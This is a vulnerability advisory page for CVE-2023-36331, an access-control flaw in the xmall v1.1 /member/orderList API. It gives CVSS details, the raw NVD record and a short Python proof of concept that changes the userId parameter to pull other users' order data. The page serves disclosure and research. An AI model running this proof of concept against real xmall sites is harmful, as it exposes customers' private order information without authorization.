Security Vulnerability Report
中文
CVE-2023-36331 CVSS 8.2 HIGH

CVE-2023-36331

Published: 2026-01-12 20:15:53
Last Modified: 2026-01-22 21:09:43
Source: [email protected]

Description

Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* - VULNERABLE
xmall v1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2023-36331 PoC - xmall v1.1 /member/orderList API Insecure Direct Object Reference # Description: Incorrect access control in /member/orderList API allows attackers to # access other users' order details via manipulation of userId parameter target_url = "http://target-server.com/member/orderList" # Attacker-controlled userId parameter to enumerate other users' orders # Modify the userId value to access different users' order information payload = { "userId": "1" # Change this value to target different users } try: # Send request with manipulated userId parameter # No authentication required to exploit this vulnerability response = requests.get(target_url, params=payload, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # If response contains order data for the specified userId, # the vulnerability is confirmed if response.status_code == 200 and "order" in response.text.lower(): print("[+] Vulnerability confirmed! Order data leaked.") print(f"[+] Leaked data for userId: {payload['userId']}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-36331", "sourceIdentifier": "[email protected]", "published": "2026-01-12T20:15:52.523", "lastModified": "2026-01-22T21:09:43.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId."}, {"lang": "es", "value": "Control de acceso incorrecto en la API /member/orderList de xmall v1.1 permite a los atacantes acceder arbitrariamente a los detalles de pedidos de otros usuarios mediante la manipulación del parámetro de consulta userId."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "E46154B1-2E17-432C-839B-1F13469BCA05"}]}]}], "references": [{"url": "https://github.com/Exrick/xmall/issues/100", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.